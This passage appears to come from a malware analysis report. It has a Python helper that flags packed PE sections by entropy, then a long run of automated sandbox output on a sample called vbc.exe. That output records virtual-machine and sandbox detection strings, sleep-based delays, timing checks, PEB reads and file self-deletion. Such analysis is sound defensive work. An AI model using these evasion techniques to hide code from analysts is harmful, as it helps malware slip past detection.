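def section_entropy_report(image: bytes, threshold: float = PACKED_THRESHOLD):
    """[(section name, entropy, flagged)] for every section; flagged when entropy >= threshold."""
    rows = []
    for name, raw in pe_sections(image):
        h = shannon_entropy(raw)
        rows.append((name, h, h >= threshold))
    return rows


def build_test_image(sections):
    """Constructed fixture: a header-only PE layout (not loadable) so the parser can be
    exercised without shipping a binary. Real files carry a 0xE0/0xF0-byte optional
    header; this fixture declares none, which the parser handles through SizeOfOptionalHeader."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    file_hdr = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0, 0x0102)
    table_off = e_lfanew + 4 + 20
    data_off = table_off + 40 * len(sections)
    table, blobs = b"", b""
    for name, blob in sections:
        table += struct.pack("<8sIIIIIIHHI", name.encode("ascii").ljust(8, b"\0"),
                             len(blob), 0x1000, len(blob), data_off + len(blobs),
                             0, 0, 0, 0, 0x60000020)
        blobs += blob
    return dos + file_hdr + table + blobs


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:                     # real use: python this_script.py sample.exe
        with open(sys.argv[1], "rb") as f:
            image = f.read()
    else:                                     # demo on the constructed fixture
        image = build_test_image([(".text", bytes(range(256)) * 8), (".rdata", b"\0" * 512)])
    for name, h, flagged in section_entropy_report(image):
        print(f"{name:<8} {h:.3f} {'PACKED?' if flagged else ''}")
```

Entropy is a triage signal, not proof: signed installers and files with large compressed resources also score high, so treat a flagged .text as a reason to look for the decryption routine and the in-memory load, as the rest of this report does.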

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\control.exe File deleted: c:\users\user\desktop\vbc.exe
Source: C:\Users\user\Desktop\vbc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\control.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: Yara match File source: 00000000.00000002.408488225.0000000002B1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.407071082.00000000028F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 6088, type: MEMORYSTR
Source: vbc.exe, 00000000.00000002.408488225.0000000002B1D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000000.00000002.407071082.00000000028F3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
Source: vbc.exe, 00000000.00000002.408488225.0000000002B1D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000000.00000002.407071082.00000000028F3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
Source: C:\Users\user\Desktop\vbc.exe TID: 3304 Thread sleep time: -45877s >= -30000s
Source: C:\Users\user\Desktop\vbc.exe TID: 2700 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\control.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01685BA5 rdtsc 6_2_01685BA5
Source: C:\Users\user\Desktop\vbc.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\vbc.exe API coverage: 4.4 %
Source: C:\Users\user\Desktop\vbc.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\vbc.exe Thread delayed: delay time: 45877
Source: C:\Users\user\Desktop\vbc.exe Thread delayed: delay time: 922337203685477
Source: vbc.exe, 00000000.00000002.407071082.00000000028F3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000007.00000000.480995882.0000000007FBD000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: vbc.exe, 00000000.00000002.407071082.00000000028F3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware
Source: explorer.exe, 00000007.00000000.480995882.0000000007FBD000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}d
Source: explorer.exe, 00000007.00000000.430054457.000000000807C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000007.00000000.430054457.000000000807C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000I
Source: explorer.exe, 00000007.00000000.471787867.0000000000778000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _VMware_SATA_CD00#5&
Source: explorer.exe, 00000007.00000000.430054457.000000000807C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000007.00000000.473972364.00000000042EE000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}q^
Source: vbc.exe, 00000000.00000002.407071082.00000000028F3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware SVGA II
Source: explorer.exe, 00000007.00000000.536669391.00000000042A0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000O
Source: vbc.exe, 00000000.00000002.407071082.00000000028F3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01685BA5 rdtsc 6_2_01685BA5
Source: C:\Users\user\Desktop\vbc.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\control.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015DB944 mov eax, dword ptr fs:[00000030h] 6_2_015DB944
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015BB171 mov eax, dword ptr fs:[00000030h] 6_2_015BB171
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015BC962 mov eax, dword ptr fs:[00000030h] 6_2_015BC962
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015B9100 mov eax, dword ptr fs:[00000030h] 6_2_015B9100
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015E513A mov eax, dword ptr fs:[00000030h] 6_2_015E513A
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015D4120 mov eax, dword ptr fs:[00000030h] 6_2_015D4120
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015D4120 mov ecx, dword ptr fs:[00000030h] 6_2_015D4120
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_016441E8 mov eax, dword ptr fs:[00000030h] 6_2_016441E8
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015BB1E1 mov eax, dword ptr fs:[00000030h] 6_2_015BB1E1
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_016749A4 mov eax, dword ptr fs:[00000030h] 6_2_016749A4
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_016369A6 mov eax, dword ptr fs:[00000030h] 6_2_016369A6
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015E2990 mov eax, dword ptr fs:[00000030h] 6_2_015E2990
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015EA185 mov eax, dword ptr fs:[00000030h] 6_2_015EA185
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_016351BE mov eax, dword ptr fs:[00000030h] 6_2_016351BE
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015DC182 mov eax, dword ptr fs:[00000030h] 6_2_015DC182
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015D99BF mov ecx, dword ptr fs:[00000030h] 6_2_015D99BF
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015D99BF mov eax, dword ptr fs:[00000030h] 6_2_015D99BF
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015E61A0 mov eax, dword ptr fs:[00000030h] 6_2_015E61A0
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015D0050 mov eax, dword ptr fs:[00000030h] 6_2_015D0050
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01672073 mov eax, dword ptr fs:[00000030h] 6_2_01672073
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01681074 mov eax, dword ptr fs:[00000030h] 6_2_01681074
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015DA830 mov eax, dword ptr fs:[00000030h] 6_2_015DA830
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015E002D mov eax, dword ptr fs:[00000030h] 6_2_015E002D
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01637016 mov eax, dword ptr fs:[00000030h] 6_2_01637016
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015CB02A mov eax, dword ptr fs:[00000030h] 6_2_015CB02A
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01684015 mov eax, dword ptr fs:[00000030h] 6_2_01684015
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_0164B8D0 mov eax, dword ptr fs:[00000030h] 6_2_0164B8D0
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_0164B8D0 mov ecx, dword ptr fs:[00000030h] 6_2_0164B8D0
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015B58EC mov eax, dword ptr fs:[00000030h] 6_2_015B58EC
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015DB8E4 mov eax, dword ptr fs:[00000030h] 6_2_015DB8E4
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015B40E1 mov eax, dword ptr fs:[00000030h] 6_2_015B40E1
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015B9080 mov eax, dword ptr fs:[00000030h] 6_2_015B9080
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015EF0BF mov ecx, dword ptr fs:[00000030h] 6_2_015EF0BF
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015EF0BF mov eax, dword ptr fs:[00000030h] 6_2_015EF0BF
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01633884 mov eax, dword ptr fs:[00000030h] 6_2_01633884
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F90AF mov eax, dword ptr fs:[00000030h] 6_2_015F90AF
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015E20A0 mov eax, dword ptr fs:[00000030h] 6_2_015E20A0
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015BF358 mov eax, dword ptr fs:[00000030h] 6_2_015BF358
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015BDB40 mov eax, dword ptr fs:[00000030h] 6_2_015BDB40
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015E3B7A mov eax, dword ptr fs:[00000030h] 6_2_015E3B7A
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01688B58 mov eax, dword ptr fs:[00000030h] 6_2_01688B58
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015BDB60 mov ecx, dword ptr fs:[00000030h] 6_2_015BDB60
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015DA309 mov eax, dword ptr fs:[00000030h] 6_2_015DA309
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_0167131B mov eax, dword ptr fs:[00000030h] 6_2_0167131B
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_016623E3 mov ecx, dword ptr fs:[00000030h] 6_2_016623E3
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_016623E3 mov eax, dword ptr fs:[00000030h] 6_2_016623E3
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_016353CA mov eax, dword ptr fs:[00000030h] 6_2_016353CA
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015DDBE9 mov eax, dword ptr fs:[00000030h] 6_2_015DDBE9
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015E03E2 mov eax, dword ptr fs:[00000030h] 6_2_015E03E2
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015E2397 mov eax, dword ptr fs:[00000030h] 6_2_015E2397
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01685BA5 mov eax, dword ptr fs:[00000030h] 6_2_01685BA5
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015EB390 mov eax, dword ptr fs:[00000030h] 6_2_015EB390
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015C1B8F mov eax, dword ptr fs:[00000030h] 6_2_015C1B8F
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_0166D380 mov ecx, dword ptr fs:[00000030h] 6_2_0166D380
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_0167138A mov eax, dword ptr fs:[00000030h] 6_2_0167138A
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015E4BAD mov eax, dword ptr fs:[00000030h] 6_2_015E4BAD
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_0166B260 mov eax, dword ptr fs:[00000030h] 6_2_0166B260
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01688A62 mov eax, dword ptr fs:[00000030h] 6_2_01688A62
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015B9240 mov eax, dword ptr fs:[00000030h] 6_2_015B9240
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F927A mov eax, dword ptr fs:[00000030h] 6_2_015F927A
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_0167EA55 mov eax, dword ptr fs:[00000030h] 6_2_0167EA55
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01644257 mov eax, dword ptr fs:[00000030h] 6_2_01644257
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015D3A1C mov eax, dword ptr fs:[00000030h] 6_2_015D3A1C
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015B5210 mov eax, dword ptr fs:[00000030h] 6_2_015B5210
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015B5210 mov ecx, dword ptr fs:[00000030h] 6_2_015B5210
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015BAA16 mov eax, dword ptr fs:[00000030h] 6_2_015BAA16
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015C8A0A mov eax, dword ptr fs:[00000030h] 6_2_015C8A0A
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_0167AA16 mov eax, dword ptr fs:[00000030h] 6_2_0167AA16
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F4A2C mov eax, dword ptr fs:[00000030h] 6_2_015F4A2C
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015DA229 mov eax, dword ptr fs:[00000030h] 6_2_015DA229
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01674AEF mov eax, dword ptr fs:[00000030h] 6_2_01674AEF
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015E2ACB mov eax, dword ptr fs:[00000030h] 6_2_015E2ACB
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015E2AE4 mov eax, dword ptr fs:[00000030h] 6_2_015E2AE4
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015ED294 mov eax, dword ptr fs:[00000030h] 6_2_015ED294
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015CAAB0 mov eax, dword ptr fs:[00000030h] 6_2_015CAAB0
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015EFAB0 mov eax, dword ptr fs:[00000030h] 6_2_015EFAB0
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015B52A5 mov eax, dword ptr fs:[00000030h] 6_2_015B52A5
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015D7D50 mov eax, dword ptr fs:[00000030h] 6_2_015D7D50
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F3D43 mov eax, dword ptr fs:[00000030h] 6_2_015F3D43
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01633540 mov eax, dword ptr fs:[00000030h] 6_2_01633540
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01663D40 mov eax, dword ptr fs:[00000030h] 6_2_01663D40
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015DC577 mov eax, dword ptr fs:[00000030h] 6_2_015DC577
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_0163A537 mov eax, dword ptr fs:[00000030h] 6_2_0163A537
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01688D34 mov eax, dword ptr fs:[00000030h] 6_2_01688D34
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_0167E539 mov eax, dword ptr fs:[00000030h] 6_2_0167E539
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015E4D3B mov eax, dword ptr fs:[00000030h] 6_2_015E4D3B
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015C3D34 mov eax, dword ptr fs:[00000030h] 6_2_015C3D34
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015BAD30 mov eax, dword ptr fs:[00000030h] 6_2_015BAD30
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_0167FDE2 mov eax, dword ptr fs:[00000030h] 6_2_0167FDE2
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_0167FDE2 mov eax, dword ptr fs:[00000030h] 6_2_0167FDE2
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_0167FDE2 mov eax, dword ptr fs:[00000030h] 6_2_0167FDE2
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_0167FDE2 mov eax, dword ptr fs:[00000030h] 6_2_0167FDE2
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01668DF1 mov eax, dword ptr fs:[00000030h] 6_2_01668DF1
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01636DC9 mov eax, dword ptr fs:[00000030h] 6_2_01636DC9
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01636DC9 mov eax, dword ptr fs:[00000030h] 6_2_01636DC9
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01636DC9 mov eax, dword ptr fs:[00000030h] 6_2_01636DC9
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01636DC9 mov ecx, dword ptr fs:[00000030h] 6_2_01636DC9
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01636DC9 mov eax, dword ptr fs:[00000030h] 6_2_01636DC9
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01636DC9 mov eax, dword ptr fs:[00000030h] 6_2_01636DC9
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015CD5E0 mov eax, dword ptr fs:[00000030h] 6_2_015CD5E0
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015CD5E0 mov eax, dword ptr fs:[00000030h] 6_2_015CD5E0
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_016805AC mov eax, dword ptr fs:[00000030h] 6_2_016805AC
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_016805AC mov eax, dword ptr fs:[00000030h] 6_2_016805AC
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015EFD9B mov eax, dword ptr fs:[00000030h] 6_2_015EFD9B
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015EFD9B mov eax, dword ptr fs:[00000030h] 6_2_015EFD9B
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015B2D8A mov eax, dword ptr fs:[00000030h] 6_2_015B2D8A
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015B2D8A mov eax, dword ptr fs:[00000030h] 6_2_015B2D8A
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015B2D8A mov eax, dword ptr fs:[00000030h] 6_2_015B2D8A
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015B2D8A mov eax, dword ptr fs:[00000030h] 6_2_015B2D8A
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015B2D8A mov eax, dword ptr fs:[00000030h] 6_2_015B2D8A
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015E2581 mov eax, dword ptr fs:[00000030h] 6_2_015E2581
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015E2581 mov eax, dword ptr fs:[00000030h] 6_2_015E2581
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015E2581 mov eax, dword ptr fs:[00000030h] 6_2_015E2581
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015E2581 mov eax, dword ptr fs:[00000030h] 6_2_015E2581
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01672D82 mov eax, dword ptr fs:[00000030h] 6_2_01672D82
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01672D82 mov eax, dword ptr fs:[00000030h] 6_2_01672D82
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01672D82 mov eax, dword ptr fs:[00000030h] 6_2_01672D82
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01672D82 mov eax, dword ptr fs:[00000030h] 6_2_01672D82
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01672D82 mov eax, dword ptr fs:[00000030h] 6_2_01672D82
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01672D82 mov eax, dword ptr fs:[00000030h] 6_2_01672D82
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01672D82 mov eax, dword ptr fs:[00000030h] 6_2_01672D82
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015E1DB5 mov eax, dword ptr fs:[00000030h] 6_2_015E1DB5
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015E1DB5 mov eax, dword ptr fs:[00000030h] 6_2_015E1DB5
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015E1DB5 mov eax, dword ptr fs:[00000030h] 6_2_015E1DB5
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015E35A1 mov eax, dword ptr fs:[00000030h] 6_2_015E35A1
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015EA44B mov eax, dword ptr fs:[00000030h] 6_2_015EA44B
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015EAC7B mov eax, dword ptr fs:[00000030h] 6_2_015EAC7B
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015EAC7B mov eax, dword ptr fs:[00000030h] 6_2_015EAC7B
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015EAC7B mov eax, dword ptr fs:[00000030h] 6_2_015EAC7B
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015EAC7B mov eax, dword ptr fs:[00000030h] 6_2_015EAC7B
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015EAC7B mov eax, dword ptr fs:[00000030h] 6_2_015EAC7B
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015EAC7B mov eax, dword ptr fs:[00000030h] 6_2_015EAC7B
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015EAC7B mov eax, dword ptr fs:[00000030h] 6_2_015EAC7B
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015EAC7B mov eax, dword ptr fs:[00000030h] 6_2_015EAC7B
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015EAC7B mov eax, dword ptr fs:[00000030h] 6_2_015EAC7B
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015EAC7B mov eax, dword ptr fs:[00000030h] 6_2_015EAC7B
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015EAC7B mov eax, dword ptr fs:[00000030h] 6_2_015EAC7B
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015D746D mov eax, dword ptr fs:[00000030h] 6_2_015D746D
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_0164C450 mov eax, dword ptr fs:[00000030h] 6_2_0164C450
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_0164C450 mov eax, dword ptr fs:[00000030h] 6_2_0164C450
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01671C06 mov eax, dword ptr fs:[00000030h] 6_2_01671C06
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01671C06 mov eax, dword ptr fs:[00000030h] 6_2_01671C06
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01671C06 mov eax, dword ptr fs:[00000030h] 6_2_01671C06
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01671C06 mov eax, dword ptr fs:[00000030h] 6_2_01671C06
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01671C06 mov eax, dword ptr fs:[00000030h] 6_2_01671C06
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01671C06 mov eax, dword ptr fs:[00000030h] 6_2_01671C06
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01671C06 mov eax, dword ptr fs:[00000030h] 6_2_01671C06
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01671C06 mov eax, dword ptr fs:[00000030h] 6_2_01671C06
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01671C06 mov eax, dword ptr fs:[00000030h] 6_2_01671C06
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01671C06 mov eax, dword ptr fs:[00000030h] 6_2_01671C06
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01671C06 mov eax, dword ptr fs:[00000030h] 6_2_01671C06
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01671C06 mov eax, dword ptr fs:[00000030h] 6_2_01671C06
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01671C06 mov eax, dword ptr fs:[00000030h] 6_2_01671C06
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01671C06 mov eax, dword ptr fs:[00000030h] 6_2_01671C06
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_0168740D mov eax, dword ptr fs:[00000030h] 6_2_0168740D
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_0168740D mov eax, dword ptr fs:[00000030h] 6_2_0168740D
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_0168740D mov eax, dword ptr fs:[00000030h] 6_2_0168740D
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01636C0A mov eax, dword ptr fs:[00000030h] 6_2_01636C0A
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01636C0A mov eax, dword ptr fs:[00000030h] 6_2_01636C0A
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01636C0A mov eax, dword ptr fs:[00000030h] 6_2_01636C0A
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01636C0A mov eax, dword ptr fs:[00000030h] 6_2_01636C0A
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015EBC2C mov eax, dword ptr fs:[00000030h] 6_2_015EBC2C
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01636CF0 mov eax, dword ptr fs:[00000030h] 6_2_01636CF0
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01636CF0 mov eax, dword ptr fs:[00000030h] 6_2_01636CF0
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01636CF0 mov eax, dword ptr fs:[00000030h] 6_2_01636CF0
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_016714FB mov eax, dword ptr fs:[00000030h] 6_2_016714FB
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01688CD6 mov eax, dword ptr fs:[00000030h] 6_2_01688CD6
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015C849B mov eax, dword ptr fs:[00000030h] 6_2_015C849B
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01674496 mov eax, dword ptr fs:[00000030h] 6_2_01674496
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01674496 mov eax, dword ptr fs:[00000030h] 6_2_01674496
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01674496 mov eax, dword ptr fs:[00000030h] 6_2_01674496
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01674496 mov eax, dword ptr fs:[00000030h] 6_2_01674496
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01674496 mov eax, dword ptr fs:[00000030h] 6_2_01674496
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01674496 mov eax, dword ptr fs:[00000030h] 6_2_01674496
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01674496 mov eax, dword ptr fs:[00000030h] 6_2_01674496
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01674496 mov eax, dword ptr fs:[00000030h] 6_2_01674496
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01674496 mov eax, dword ptr fs:[00000030h] 6_2_01674496
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01674496 mov eax, dword ptr fs:[00000030h] 6_2_01674496
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01674496 mov eax, dword ptr fs:[00000030h] 6_2_01674496
